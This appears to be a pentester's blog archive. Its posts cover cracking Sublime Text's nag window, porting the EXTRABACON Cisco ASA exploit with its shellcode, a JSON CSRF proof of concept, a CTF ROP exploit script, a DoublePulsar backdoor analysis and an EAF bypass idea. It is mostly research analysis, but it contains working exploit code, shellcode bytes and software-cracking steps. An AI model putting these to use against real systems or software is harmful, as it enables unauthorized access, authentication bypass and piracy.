Normal view

There are new articles available, click to refresh the page.
Before yesterdayPentest/Red Team

Removing Sublime Text Nag Window

8 September 2016 at 15:08
I contemplated releasing this blog post earlier, and now that everyone has moved on from Sublime Text to Atom there's really no reason not to push it out. This is posted purely for educational purposes.

Everyone who has used the free version of Sublime Text knows that when you go to save a file, it will randomly show a popup asking you to buy the software. This is known as a "nag window".



The first time I saw it, I knew it had to be cracked. Just pop open the sublime_text.exe file in IDA Pro and search for the string.



We find a match, and IDA tells us where it is cross referenced.



We open the function that uses these .rdata bytes and see that it checks some globals, and performs a call to rand(). If any of the checks fail it will display the popup. The function itself is only about 20 lines of pretty basic assembly but we decompile it anyway because the screenshot is cooler that way.



We open the hex view to see what the hex code for the start of the function looks like.



Next we open sublime_text.exe in Hex Workshop and search for the hex string that matches the assembly.



Finally, we patch the beginning of the function with the assembly opcode c3, which will cause the function to immediately return.



After saving, there will be no more nag window. As an exercise to the reader, try to make Sublime think you have a registered copy.

Reverse Engineering Cisco ASA for EXTRABACON Offsets

17 September 2016 at 23:59

Update Sept. 24: auxiliary/admin/cisco/cisco_asa_extrabacon is now in the Metasploit master repo. There is support for the original ExtraBacon leak and ~20 other newer versions.

Update Sept. 22: Check this GitHub repo for ExtraBacon 2.0, improved Python code, a Lina offset finder script, support for a few more 9.x versions, and a Metasploit module.

Background 

On August 13, 2016 a mysterious Twitter account (@shadowbrokerss) appeared, tweeting a PasteBin link to numerous news organizations. The link described the process for an auction to unlock an encrypted file that claimed to contain hacking tools belonging to the Equation Group. Dubbed last year by Kaspersky Lab, Equation Group are sophisticated malware authors believed to be part of the Office of Tailored Access Operations (TAO), a cyber-warfare intelligence-gathering unit of the National Security Agency (NSA). As a show of good faith, a second encrypted file and corresponding password were released, with tools containing numerous exploits and even zero-day vulnerabilities.

One of the zero-day vulnerabilities released was a remote code execution in the Cisco Adaptive Security Appliance (ASA) device. The Equation Group's exploit for this was named EXTRABACON. Cisco ASAs are commonly used as the primary firewall for many organizations, so the EXTRABACON exploit release raised many eyebrows.

At RiskSense we had spare ASAs lying around in our red team lab, and my colleague Zachary Harding was extremely interested in exploiting this vulnerability. I told him if he got the ASAs properly configured for remote debugging I would help in the exploitation process. Of course, the fact that there are virtually no exploit mitigations (i.e. ASLR, stack canaries, et al) on Cisco ASAs may have weighed in on my willingness to help. He configured two ASAs, one containing version 8.4(3) (which had EXTRABACON exploit code), and version 9.2(3) which we would target to write new code.

This blog post will explain the methodology for the following submissions to exploit-db.com:

There is detailed information about how to support other versions of Cisco ASA for the exploit. Only a few versions of 8.x were in the exploit code, however the vulnerability affected all versions of ASA, including all of 8.x and 9.x. This post also contains information about how we were able to decrease the Equation Group shellcode from 2 stages containing over 200+ bytes to 1 stage of 69 bytes.

Understanding the Exploit 

Before we can begin porting the exploit to a new version, or improving the shellcode, we first need to know how the exploit works.

This remote exploit is your standard stack buffer overflow, caused by sending a crafted SNMP packet to the ASA. From the internal network, it's pretty much a guarantee with the default configuration. We were also able to confirm the attack can originate from the external network in some setups.

Hijacking Execution 

The first step in exploiting a 32-bit x86 buffer overflow is to control the EIP (instruction pointer) register. In x86, a function CALL pushes the current EIP location to the stack, and a RET pops that value and jumps to it. Since we overflow the stack, we can change the return address to any location we want.

In the shellcode_asa843.py file, the first interesting thing to see is:

my_ret_addr_len = 4
my_ret_addr_byte = "\xc8\x26\xa0\x09"
my_ret_addr_snmp = "200.38.160.9"

This is an offset in 8.4(3) to 0x09a026c8. As this was a classic stack buffer overflow exploit, my gut told me this was where we would overwrite the RET address, and that there would be a JMP ESP (jump to stack pointer) here. Sometimes your gut is right:

The vulnerable file is called "lina". And it's an ELF file; who needs IDA when you can use objdump?

Stage 1: "Finder" 

The Equation Group shellcode is actually 3 stages. After we JMP ESP, we find our EIP in the "finder" shellcode.

finder_len = 9
finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90"
finder_snmp = "139.124.36.20.139.7.255.224.144"

This code finds some pointer on the stack and jumps to it. The pointer contains the second stage.

We didn't do much investigating here as it was the same static offsets for every version. Our improved shellcode also uses this first stage.

Stage 2: "Preamble" 

Observing the main Python source code, we can see how the second stage is made:

        wrapper = sc.preamble_snmp
        if self.params.msg:
            wrapper += "." + sc.successmsg_snmp
        wrapper += "." + sc.launcher_snmp
        wrapper += "." + sc.postscript_snmp

Ignoring successmsg_snmp (as the script --help text says DO NOT USE), the following shellcode is built:

It seems like a lot is going on here, but it's pretty simple.

  1. A "safe" return address is XORed by 0xa5a5a5a5
    1. unnecessary, yet this type of XOR is everywhere. The shellcode can contain null bytes so we don't need a mask
  2. Registers smashed by the stack overflow are fixed, including the frame base pointer (EBP)
  3. The fixed registers are saved (PUSHA = push all)
  4. A pointer to the third stage "payload" (to be discussed soon) is found on the stack
    • This offset gave us trouble. Luckily our improved shellcode doesn't need it!
  5. Payload is called, and returns
  6. The saved registers are restored (POPA = pop all)
  7. The shellcode returns execution to the "safe" location, as if nothing happened

I'm guessing the safe return address is where the buffer overflow would have returned if not exploited, but we haven't actually investigated the root cause of the vulnerability, just how the exploit works. This is probably the most elusive offset we will need to find, and IDA does not recognize this part of the code section as part of a function.

If we follow the function that is called before our safe return, we can see why there are quite a few registers that need to be cleaned up.

These registers also get smashed by our overflow. If we don't fix the register values, the program will crash. Luckily the cleanup shellcode can be pretty static, with only the EBP register changing a little bit based on how much stack space is used.

Stage 3: "Payload" 

The third stage is where the magic finally happens. Normally shellcode, as it is aptly named, spawns a shell. But the Equation Group has another trick up its sleeve. Instead, we patch two functions, which we called "pmcheck()" and "admauth()", to always return true. With these two functions patched, we can log onto the ASA admin account without knowing the correct password.

Note: this is for payload "pass-disable". There's a second payload, "pass-enable", which re-patches the bytes. So after you log in as admin, you can run a second exploit to clean up your tracks.

For this stage, there is payload_PMCHECK_DISABLE_byte and payload_AAAADMINAUTH_DISABLE_byte. These two shellcodes perform the same overall function, just for different offsets, with a lot of code reuse.

Here is the Equation Group PMCHECK_DISABLE shellcode:

There's some shellcode trickery going on, but here are the steps being taken:

  1. First, the syscall to mprotect() marks a page of memory as read/write/exec, so we can patch the code
  2. Next, we jump forward to right before the end of the shellcode
    • The last 3 lines of the shellcode contain the code to "always return true"
  3. The call instruction puts the current address (where patch code is) on the stack
  4. The patch code address is pop'd into esi and we jump backwards
  5. rep movs copies 4 bytes (ecx) from esi (source index) to edi (destination index), then we jump to the admauth() patch

The following is functional equivalent C code:

const void *PMCHECK_BOUNDS = 0x954c000;
const void *PMCHECK_OFFSET = 0x954cfd0;

const int32_t PATCH_BYTES = 0xc340c031;

sys_mprotect(PMCHECK_BOUNDS, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
*PMCHECK_OFFSET = PATCH_BYTES;

In this case, PMCHECK_BYTES will be "always return true".

xor eax, eax   ; set eax to 0  -- 31 c0
inc eax        ; increment eax -- 40
ret            ; return        -- c3

Yes, my friends who are fluent in shellcode, the assembly is extremely verbose just to write 4 bytes to a memory location. Here is how we summarized everything from loc_00000025 to the end in the improved shellcode:

mov dword [PMCHECK_OFFSET], PMCHECK_BYTES

In the inverse operation, pass-enable, we will simply patch the bytes to their original values.

Finding Offsets 

So now that we've reverse engineered the shellcode, we know what offsets we need to patch to port the exploit to a new Cisco ASA version:

  1. The RET smash, which should be JMP ESP (ff e4) bytes
  2. The "safe" return address, to continue execution after our shellcode runs
  3. The address of pmcheck()
  4. The address of admauth()

RET Smash 

We can set the RET smash address to anywhere JMP ESP (ff e4) opcodes appear in an executable section of the binary. There is no shortage of the actual instruction in 9.2(3).

Any of these will do, so we just picked a random one.

Safe Return Address 

This is the location to safely return execution to after the shellcode runs. As mentioned, this part of the code isn't actually recognized as a function by IDA, and also the same trick we'll use for the Authentication Functions (searching the assembly with ROPgadget) doesn't work here.

The offset in 8.4(3) is 0xad457e33 ^ 0xa5a5a5a5 = 0x8e0db96

This contains a very unique signature of common bytes we can grep for in 9.2(3).

Our safe return address offset is at 0x9277386.

Authentication Functions 

Finding the offsets for pmcheck() and admauth() is pretty simple. The offsets in 8.4(3) are not XORed by 0xa5a5a5a5, but the page alignment for sys_mprotect() is.

We'll dump the pmcheck() function from 8.4(3).

We have the bytes of the function, so we can use the Python ROPGadget tool from Jonathan Salwan to search for those bytes in 9.2(3).

It's a pretty straightforward process, which can be repeated for admauth() offsets. Note that during this process, we get the unpatch bytes needed for the pass-enable shellcode.

Finding the page alignment boundaries for these offsets (for use in sys_mprotect()) is easy as well, just floor to the nearest 0x1000.

Improving the Shellcode 

We were able to combine the Equation Group stages "preamble" and "payload" into a single stage by rewriting the shellcode. Here is a list of ways we shortened the exploit code:

  1. Removed all XOR 0xa5a5a5a5 operations, as null bytes are allowed
  2. Reused code for the two sys_mprotect() calls
  3. Used a single mov operation instead of jmp/call/pop/rep movs to patch the code
  4. General shellcode size optimization tricks (performing the same tasks with ops that use less bytes)

The lackadaisical approach to the shellcode, as well as the Python code, came as a bit of surprise as the Equation Group is probably the most elite APT on the planet. There's a lot of cleverness in the code though, and whoever originally wrote it obviously had to be competent. To me, it appears the shellcode is kind of an off-the-shelf solution to solving generic problems, instead of being custom tailored for the exploit.

By changing the shellcode, we gained one enormous benefit. We no longer have to find the stack offset that contains a pointer to the third stage. This step gave us so much trouble that we started experimenting with using an egg hunter. We know that the stack offset to the third stage was a bottleneck for SilentSignal as well (Bake Your Own EXTRABACON). But once we understood the overall operation of all stages, we were happy to just reduce the bytes and keep everything in the one stage. Not having to find the third stage offset makes porting the exploit very simple.

Future Work 

The Equation Group appeared to have generated their shellcode. We have written a Python script that will auto-port the code to different versions. We find offsets using similar heuristics to what ROPGadget offers. Of course, you can't trust a tool 100% (in fact, some of the Equation Group shellcode crashes certain versions). So we are testing each version.

We're also porting the Python code to Ruby, so the exploit will be part of Metasploit. Our Metasploit module will contain the new shellcode for all Shadow Broker versions, as well as offsets for numerous versions not part of the original release, so keep an eye out for it.

CSRF Attack for JSON-encoded Endpoints

19 September 2016 at 16:15

Sometimes you see a possible Cross-Site Request Forgery (CSRF) attack against JSON endpoints, where data is a JSON blob instead of x-www-form-urlencoded data.

Here is a PoC that will send a JSON CSRF.

<html> 
    <form action="http://127.0.0.1/json" method="post" 
        enctype="text/plain" name="jsoncsrf"> 
        <input 
            name='{"json":{"nested":"obj"},"list":["0","1"]}' 
            type='hidden'> 
    </form> 
    <script>
         document.jsoncsrf.submit()
    </script>
</html>

You can use any JSON including nested objects, lists, etc.

The previous example adds a trailing equal sign =, which will break some parsers. You can get around it with:

<input name='{"json":"data","extra' value='":"stuff"}' 
    type='hidden'> 

Which will give the following JSON:

{"json":"data","extra=":"stuff"} 

Hack the Vote CTF "IRS" Solution

6 November 2016 at 23:00

RPISEC ran a capture the flag called Hack the Vote 2016 that was themed after the election. In the competition was the "IRS" challenge by pigeon.

IRS challenge clue:

Good day fellow Americans. In the interest of making filing your tax returns as easy and painless as possible, we've created this nifty lil' program to better serve you! Simply enter your name and file away! And don't you worry, everyone's file is password protected ;)

We get a pwnable x86 ELF Linux binary with non-executable stack. There's also details for a server to ncat to to exploit it.

The program contains about 10 functions that are relatively straightforward about what they do just going off the strings. Exploring the program, there is a blatant address leak when there is an attempt to create more than 5 total users in the system.

This %p is given to puts(). It dereferences to a pointer address that is the start of an array of structs which hold IRS tax return data. Here is the initialization code for Trump's struct:

Note that Trump's password is "not_the_flag" here, but on the server it will be the flag.

Preceding Trump's struct construction is a call to malloc() with 108 bytes, and throughout the program we only see 4 distinct fields. So the completed struct most likely is:

struct IRS_Data
{
    char name[50];
    char pass[50];
    int32_t income;
    int32_t deductibles;
};

In a function which I named edit_tax_return(), there is a call to gets(). This is a highly vulnerable C function that writes to a buffer from stdin with no constraints on length, and thus should probably never be used.

The exploitation process can be pretty simple if you take advantage of other functions present in the binary.

  1. Create enough users to leak the user array pointer
  2. Overflow the gets() in edit_tax_return() with a ROP chain
  3. ROP #1 calls view_tax_return() with the leaked pointer and index 0 (a.k.a. Trump)
  4. ROP #2 cleanly returns back to the start of main()
#!/usr/bin/env python2
from pwn import *

#r = remote("irs.pwn.republican", 4127)
r = process('./irs.4ded.3360.elf')

r.send("1\n"*21)                # create a bunch of fake users
r.recvuntil("0x")               # get the leaked %p address

database_addr = int(r.recvline().strip(), 16)
log.success("Got leaked address %08x" % database_addr)

r.send("3\n"+"1\n"*4)           # edit a known user record

overflow = "A"*25
overflow += p32(0x0804892C)     # print_tax_return(pDB, i)
overflow += p32(0x08048a39)     # main(void), safe return
overflow += p32(database_addr)  # pDB
overflow += p32(0x00000000)     # i

r.send(overflow + "\n")         # 08048911    call    gets

r.recvuntil("Password: ")       # print_tax_return() Trump password

flag = r.recvline().split(" ")[0]
log.success(flag)

Hack the Vote CTF "The Wall" Solution

6 November 2016 at 23:01

RPISEC ran a capture the flag called Hack the Vote 2016 that was themed after the election. In the competition was "The Wall" challenge by itszn.

The Wall challenge clue:

The Trump campaign is running a trial of The Wall plan. They want to prove that no illegal immigrants could get past it. If that goes as planned, us here at the DNC will have a hard time swinging some votes in the southern boarder states. We need you to hack system and get past the wall. I heard they have put extra protections into place, but we think you can still do it. If you do get into America, there should be a flag somewhere in the midwest that you can have. You will be US "citizen" after all.

The challenge link was a tarball with a bunch of directories. Inside the /bin/ folder was an x64 ELF called "minetest", which is a Minecraft clone. I was pleased to see this was a video game challenge, having a fair amount of infamy for hacking online games in my past lives.

When you run the game, you log onto a server and are greeted with Trump's wall. It's yuuuge, spanning infinitely across the horizontal plane.

So the goal must be to get around this wall and into America. I tried a few naive approaches, as I just wanted to get something like a simple warp or run-through-wall type of cheat running, but alas there was an anti-cheat built into the game.

No problem, it wouldn't be the first time I've had to defeat an anti-cheat system. I started reversing a function called Client::handleCommand_CheatChallange() (sic):

I deduced this function was reading /proc/self/maps and running a SHA1 function on it. At first I was going to just overwrite this function to make it give the expected SHA1, but then I started backing up and found this function was only called when you first joined the server. So all that was needed to bypass the anti-cheat was to delay load however I planned to cheat.

Poking around the game and binary some more, I noticed there was a "fly" mode, that my client didn't have the privilege from the server for:

Well, my client still has the code for flying even if the server says I don't have the privilege. I found a function called Client::checkLocalPrivilege(). The function takes a C++ std::string of a privilege (such as fly) and returns a bool.

Yea, this guy's doing way too much work for me. Time to patch it with the following assembly:

inc eax   ; ff c0
ret       ; c3  
nop       ; 90

This will make the function always return true when my client checks if I have access to a certain privilege. After logging into the server, I attached to my client with GDB and patched my new assembly into the privilege check function:

Now that I could fly, I noticed the wall also grew infinitely vertical. Fortunately, from way up high I was able to glitch through the wall.

I made it!

I wandered through the desert for 40 days and 40 night cycles.

No really, I wandered a long time. I should also mention disabling the privilege checks gives access to a speed hack, but it was a little glitchy and the server kept warping me backwards.

I was starting to get worried, when all of a sudden I saw beautiful Old Glory off in the distance.

Overflow Exploit Pattern Generator - Online Tool

27 November 2016 at 05:25

Metasploit's pattern generator is a great tool, but Ruby's startup time is abysmally slow. Out of frustration, I made this in-browser online pattern generator written in JavaScript.

Generate Overflow Pattern


Find Overflow Offset

For the unfamiliar, this tool will generate a non-repeating pattern. You drop it into your exploit proof of concept. You crash the program, and see what the value of your instruction pointer register is. You type that value in to find the offset of how big your buffer should be overflowed before you hijack execution.

See also: Obfuscated String/Shellcode Generator - Online Tool

MS17-010 (SMB RCE) Metasploit Scanner Detection Module

19 April 2017 at 03:28

Update April 21, 2017 - There is an active pull request at Metasploit master which adds DoublePulsar infection detection to this module.

During the first Shadow Brokers leak, my colleagues at RiskSense and I reverse engineered and improved the EXTRABACON exploit, which I wrote a feature about for PenTest Magazine. Last Friday, Shadow Brokers leaked FuzzBunch, a Metasploit-like attack framework that hosts a number of Windows exploits not previously seen. Microsoft's official response says these exploits were fixed up in MS17-010, released in mid-March.

Yet again I find myself tangled up in the latest Shadow Brokers leak. I actually wrote a scanner to detect MS17-010 about 2-3 weeks prior to the leak, judging by the date on my initial pull request to Metasploit master. William Vu, of Rapid7 (and whom coincidentally I met in person the day of the leak), added some improvements as well. It was pulled into the master branch on the day of the leak. This module can be used to scan a network range (RHOSTS) and detect if the patch is missing or not.

Module Information Page
https://rapid7.com/db/modules/auxiliary/scanner/smb/smb_ms17_010

Module Source Code
https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb

My scanner module connects to the IPC$ tree and attempts a PeekNamedPipe transaction on FID 0. If the status returned is "STATUS_INSUFF_SERVER_RESOURCES", the machine does not have the MS17-010 patch. After the patch, Win10 returns "STATUS_ACCESS_DENIED" and other Windows versions "STATUS_INVALID_HANDLE". In case none of these are detected, the module says it was not able to detect the patch level (I haven't seen this in practice).

IPC$ is the "InterProcess Communication" share, which generally does not require valid SMB credentials in default server configurations. Thus this module can usually be done as an unauthed scan, as it can log on as the user "\" and connect to IPC$.

This is the most important patch for Windows in almost a decade, as it fixes several remote vulnerabilities for which there are now public exploits (EternalBlue, EternalRomance, and EternalSynergy).

These are highly complex exploits, but the FuzzBunch framework essentially makes the process as easy as point and shoot. EternalRomance does a ridiculous amount of "grooming", aka remote heap feng shui. In the case of EternalBlue, it spawns numerous threads and simultaneously exploits SMBv1 and SMBv2, and seems to talk Cairo, an undocumented SMB LanMan alternative (only known because of the NT4 source code leaks). I haven't gotten around to looking at EternalSynergy yet.

I am curious to learn more, but have too many side projects at the moment to spend my full efforts investigating further. And unlike EXTRABACON, I don't see any "obvious" improvements other than I would like to see an open source version.

DoublePulsar Initial SMB Backdoor Ring 0 Shellcode Analysis

22 April 2017 at 04:59

One week ago today, the Shadow Brokers (an unknown hacking entity) leaked the Equation Group's (NSA) FuzzBunch software, an exploitation framework similar to Metasploit. In the framework were several unauthenticated, remote exploits for Windows (such as the exploits codenamed EternalBlue, EternalRomance, and EternalSynergy). Many of the vulnerabilities that are exploited were fixed in MS17-010, perhaps the most critical Windows patch in almost a decade.

Side note: You can use my MS17-010 Metasploit auxiliary module to scan your networks for systems missing this patch (uncredentialed and non-intrusive). If a missing patch is found, it will also check for an existing DoublePulsar infection.

Introduction

For those unfamiliar, DoublePulsar is the primary payload used in SMB and RDP exploits in FuzzBunch. Analysis was performed using the EternalBlue SMBv1/SMBv2 exploit against Windows Server 2008 R2 SP1 x64.

The shellcode, in tl;dr fashion, essentially performs the following:

  • Step 0: Shellcode sorcery to determine if x86 or x64, and branches as such.
  • Step 1: Locates the IDT from the KPCR, and traverses backwards from the first interrupt handler to find ntoskrnl.exe base address (DOS MZ header).
  • Step 2: Reads ntoskrnl.exe's exports directory, and uses hashes (similar to usermode shellcode) to find ExAllocPool/ExFreePool/ZwQuerySystemInformation functions.
  • Step 3: Invokes ZwQuerySystemInformation() with the enum value SystemQueryModuleInformation, which loads a list of all drivers. It uses this to locate Srv.sys, an SMB driver.
  • Step 4: Switches the SrvTransactionNotImplemented() function pointer located at SrvTransaction2DispatchTable[14] to its own hook function.
  • Step 5: With secondary DoublePulsar payloads (such as inject DLL), the hook function sees if you "knock" correctly and allocates an executable buffer to run your raw shellcode. All other requests are forwarded directly to the original SrvTransactionNotImplemented() function. "Burning" DoublePulsar doesn't completely erase the hook function from memory, just makes it dormant.

After exploitation, you can see the missing symbol in the SrvTransaction2DispatchTable. There are supposed to be 2 handlers here with the SrvTransactionNotImplemented symbol. This is the DoublePulsar backdoor (array index 14):

Honestly, you don't usually wake up in the morning and feel like spending time dissecting ~3600 some odd bytes of Ring-0 shellcode, but I felt productive today. Also I was really curious about this payload and didn't see many details about it outside of Countercept's analysis of the DLL injection code. But I was interested in how the initial SMB backdoor is installed, which is what this post is about.

Zach Harding, Dylan Davis, and I kind of rushed through it in a few hours in our red team lab at RiskSense. There is some interesting setup in the EternalBlue exploit with the IA32_LSTAR syscall MSR (0xc000082) and a region of the Srv.sys containing FEFEs, but I will instead focus on just the raw DoublePulsar methodology... Much like the EXTRABACON shellcode, this one is crafty and does not simply spawn a shell.

Detailed Shellcode Analysis

Inside the Shadow Brokers dump you can find DoublePulsar.exe and EternalBlue.exe. When you use DoublePulsar in FuzzBunch, there is an option to spit its shellcode out to a file. We found out this is a red herring, and that the EternalBlue.exe contained its own payload.

Step 0: Determine CPU Architecture

The main payload is quite large because it contains shellcode for both x86 and x64. The first few bytes use opcode trickery to branch to the correct architecture (see my previous article on assembly architecture detection).

Here is how x86 sees the first few bytes.

You'll notice that inc eax means the je (jump equal/zero) instruction is not taken. What follows is a call and a pop, which is to get the current instruction pointer.

And here is how x64 sees it:

The inc eax byte is instead the REX preamble for a NOP. So the zero flag is still set from the xor eax, eax operation. Since x64 has RIP-relative addressing it doesn't need to get the RIP register.

The x86 payload is essentially the same thing as the x64 so this post only focuses on x64.

Since the NOP was a true NOP on x64, I overwrote the 40 90 with cc cc (int 3) using a hex editor. Interrupt 3 is how debuggers set software breakpoints.

Now when the system is exploited, our attached kernel debugger will automatically break when the shellcode starts executing.

Step 1: Find ntoskrnl.exe Base Address

Once the shellcode figures out it is x64 it begins to search for the base of ntoskrnl.exe. This is done with the following stub:

Fairly straightforward code. In user mode, the GS segment for x64 contains the Thread Information Block (TIB), which holds the Process Environment Block (PEB), a struct which contains all kinds of information about the current running process. In kernel mode, this segment instead contains the Kernel Process Control Region (KPCR), a struct which at offset zero actually contains the current process PEB.

This code grabs offset 0x38 of the KPCR, which is the "IdtBase" and contains a pointer struct of KIDTENTRY64. Those familiar with the x86 family will know this is the Interrupt Descriptor Table.

At offset 4 into the KIDENTRY64 struct you can get a function pointer to the interrupt handler, which is code defined inside of ntoskrnl.exe. From there it searches backwards in memory in 0x1000 increments (page size) for the .exe DOS MZ header (cmp bx, 0x5a4d).

Step 2: Locate Necessary Function Pointers

Once you know where the MZ header of a PE file is, you can peek into defined offsets for the export directory and get the relative virtual address (RVA) of any function you want. Userland shellcode does this all the time, usually to find necessary functions it needs out of ntdll.dll and kernel32.dll. Just like most userland shellcode, this ring 0 shellcode also uses a hashing algorithm instead of hard-coded strings in order to find the necessary functions.

The following functions are found:

ExAllocatePool can be used to create regions of executable memory, and ExFreePool can clean it up when done. These are important so the shellcode can allocate space for its hooks and other functions. ZwQuerySystemInformation is important in the next step.

Step 3: Locate Srv.sys SMB Driver

A feature of ZwQuerySystemInformation is a constant named SystemQueryModuleInformation, with the value 0xb. This gives a list of all loaded drivers in the system.

The shellcode then searched this list for two different hashes, and it landed on Srv.sys, which is one of the main drivers that SMB runs on.

The process here is basically equivalent to getting PEB->Ldr in userland, which lets you iterate loaded DLLs. Instead, it was looking for the SMB driver.

Step 4: Patch the SMB Trans2 Dispatch Table

Now that the DoublePulsar shellcode has the main SMB driver, it iterates over the .sys PE sections until it gets to the .data section.

Inside of the .data section is generally global read/write memory, and stored here is the SrvTransaction2DispatchTable, an array of function pointers that handle different SMB tasks.

The shellcode allocates some memory and copies over the code for its function hook.

Next the shellcode stores the function pointer for the dispatch named SrvTransactionNotImplemented() (so that it can call it from within the hook code). It then overwrites this member inside SrvTransaction2DispatchTable with the hook.

That's it. The backdoor is complete. Now it just returns up its own call stack and does some small cleanup chores.

Step 5: Send "Knock" and Raw Shellcode

Now when DoublePulsar sends its specific "knock" requests (which are seen as invalid SMB calls), the dispatch table calls the hooked fake SrvTransactionNotImplemented() function. Odd behavior is observed: normally the SMB response MultiplexID must match the SMB request MultiplexID, but instead it is incremented by a delta, which serves as a status code.

Operations are hidden in plain sight via steganography, which do not have proper dissectors in Wireshark.

The status codes (via MultiplexID delta) are:

  • 0x10 = success
  • 0x20 = invalid parameters
  • 0x30 = allocation failure

The opcode list is as follows:

  • 0x23 = ping
  • 0xc8 = exec
  • 0x77 = kill

You can tell which opcode was called by using the following algorithm:

t = SMB.Trans2.Timeout
op = (t) + (t >> 8) + (t >> 16) + (t >> 24);

Conversely, you can make the packet using this algorithm, where k is randomly generated:

op = 0x23
k = 0xdeadbeef
t = 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00

Sending a ping opcode in a Trans2 SESSION_SETUP request will yield a response that holds part of a XOR key that needs to be calculated for exec requests.

The "XOR key" algorithm is:

s = SMB.Signature1
x = 2 * s ^ (((s & 0xff00 | (s > 16) | s & 0xff0000) >> 8))

More shellcode can be sent with a Trans2 SESSION_SETUP request and exec opcode. The shellcode is sent in the "data payload" part of the packet 4096 bytes at a time, using the XOR key as a basic stream cipher. The backdoor will allocate an executable region of memory, decrypt and copy over the shellcode, and run it. The Inject DLL payload is simply some DLL loading shellcode prepended to the DLL you actually want to inject.

We can see the hook is installed at SrvTransaction2DispatchTable+0x70 (112/8 = index 14):

And of course the full disassembly listing.

Conclusion

There you have it, a highly sophisticated, multi-architecture SMB backdoor. The world probably did not need a remote Windows kernel payload this advanced being spammed across the Internet. It's an unique payload, because you can infect a system, lay low for a little bit, and come back later when you want to do something more intrusive. It also finds a nice place in the system to hide out and not alert built-in defenses like PatchGuard. It is unclear if newer versions of PatchGuard, such as those in Windows 10, already detect this hook. We can expect them to be added if not.

Usually we only get to see kernel shellcode in local exploits, as it swaps process tokens in order to privilege escalate. However, Microsoft does many networking things in the kernel, such as Srv.sys and HTTP.sys. The techniques demonstrated are in many ways completely analagous to how usermode shellcode operates during remote exploits.

If/when this gets ported over to Metasploit, I would probably not copy this verbatim, and rather skip the backdoor idea. It isn't the most secure thing to do, as it's not a big secret anymore and anyone else can come along and use your backdoor.

Here's what can be done instead:

  1. Obtain ntoskrnl.exe address in the same fashion as DoublePulsar, and read export directory for necessary functions to perform the next operations.
  2. Spawn a hidden process (such as notepad.exe).
  3. Queue an APC with Meterpreter payload.
  4. Resume process, and exit the kernel cleanly.

Every major malware family, from botnets to ransomware to banking spyware, will eventually add the exploits in the FuzzBunch toolkit to their arsenal. This payload is simply a mechanism to load more malware with full system privileges. It does not open new ports, or have any real encryption or other features to prevent others from taking advantage of the same hole, making the attribution game for digital forensic investigators even more difficult. This is a jewel compared to the scraps that were given to Stuxnet. It comes in a more dangerous era than the days of Conficker. Given the persistence of the missing MS08-067 patch, we could be in store for a decade of breaches emanating from MS17-010 exploits. It is the perfect storm for one of the most damaging malware infections in computing history.

ETERNALBLUE: Exploit Analysis and Port to Microsoft Windows 10

8 June 2017 at 02:55

The whitepaper for the research done on ETERNALBLUE by @JennaMagius and I has been completed.

Be sure to check the bibliography for other great writeups of the pool grooming and overflow process. This paper breaks some new ground by explaining the execution chain after the memory corrupting overwrite is complete.

PDF Download

Errata

r5hjrtgher pointed out the vulnerable code section did not appear accurate. Upon further investigation, we discovered this was correct. The confusion was because unlike the version of Windows Server 2008 we originally reversed, on Windows 10 the Srv!SrvOs2FeaListSizeToNt function was inlined inside Srv!SrvOs2FeaListToNt. We saw a similar code path and hastily concluded it was the vulnerable one. Narrowing the exact location was not necessary to port the exploit.

Here is the correct vulnerable code path for Windows 10 version 1511:

How the vulnerability was patched with MS17-010:

The 16-bit registers were replaced with 32-bit versions, to prevent the mathematical miscalculation leading to buffer overflow.

Minor note: there was also extra assembly and mitigations added in the code paths leading to this.

To all the foreign intelligence agencies trying to spear phish I've already deleted all my data! :tinfoil:

Talk/Workshop at DEF CON 25

8 June 2017 at 03:07

Just got the word that @aleph___naught and I will be presenting a talk and workshop at DEF CON 25.

Our talk is a post-exploitation RAT using the Windows Script Host. Executing completely from memory with tons of ways to fork to shellcode. Will contain some original research (with the help of @JennaMagius and @The_Naterz) and amazing prior work by @tiraniddo, @subTee, and @enigma0x3. Queue @mattifestation interjecting with something about app whitelisting!

The workshop is not just the tactics, but the code and reverse engineering behind all the stuff in penetration testing rootkits such as Meterpreter and PowerShell Empire. It will include a deep look into Windows internals and some new concepts and ideas not yet present in the normal set of tools.

All slides and code will be posted at the end of DEF CON.

Proposed Windows 10 EAF/EMET "Bypass" for Reflective DLL Injection

1 July 2017 at 07:01

Windows 10 Redstone 3 (Fall Creator's Update) is adding Exploit Guard, bringing EMET's Export Address Table Access Filtering (EAF) mitigation, among others, to the system. We are still living in a golden era of Windows exploitation and post-exploitation, compared to the way things will be once the world moves onto Windows 10. This is a mitigation that will need to be bypassed sooner or later.

EAF sets hardware breakpoints that check for legitimate access when the function exports of KERNEL32.DLL and NTDLL.DLL are read. It does this by checking if the offending caller code is part of a legitimately loaded module (which reflective DLL injection is not). EAF+ adds another breakpoint for KERNELBASE.DLL. One bypass was searching a DLL such as USER32.DLL for its imports, however Windows 10 will also be adding the brand new Import Address Table Access Filtering (IAF).

So how can we avoid the EAF exploit mitigation? Simple, reflective DLLs, just like normal DLLs, take an LPVOID lpParam. Currently, the loader code does nothing with this besides forwarding it to DllMain. We can allocate and pass a pointer to this struct.

#pragma pack(1)
typedef struct _REFLECTIVE_LOADER_INFO
{

    LPVOID  lpRealParam;
    LPVOID  lpDosHeader;
    FARPROC fLoadLibraryA;
    FARPROC fGetProcAddress;
    FARPROC fVirtualAlloc;
    FARPROC fNtFlushInstructionCache;
    FARPROC fVirtualLock;

} REFLECTIVE_LOADER_INFO, *PREFLECTIVE_LOADER_INFO;

Instead of performing two allocations, we could also shove this information in a code cave at start of the ReflectiveLoader(), or in the DOS headers. I don't think DOS headers are viable for Metasploit, which inserts shellcode there (that does some MSF setup and jumps to ReflectiveLoader(), so you can start execution at offset 0), but perhaps in the stub between the DOS->e_lfanew field and the NT headers.

Reflective DLLs search backwards in memory for their base MZ DOS header address, requiring a second function with the _ReturnAddress() intrinsic. We know this information and can avoid the entire process (note: method not possible if we shove in DOS headers).

Likewise, the addresses for the APIs we need are also known information before the reflective loader is called. While it's true that there is full ASLR for most loaded DLL modules these days, KERNEL32.DLL and NTDLL.DLL are only randomized upon system boot. Unless we do something weird, the addresses we see in the injecting process will be the same as in the injected process.

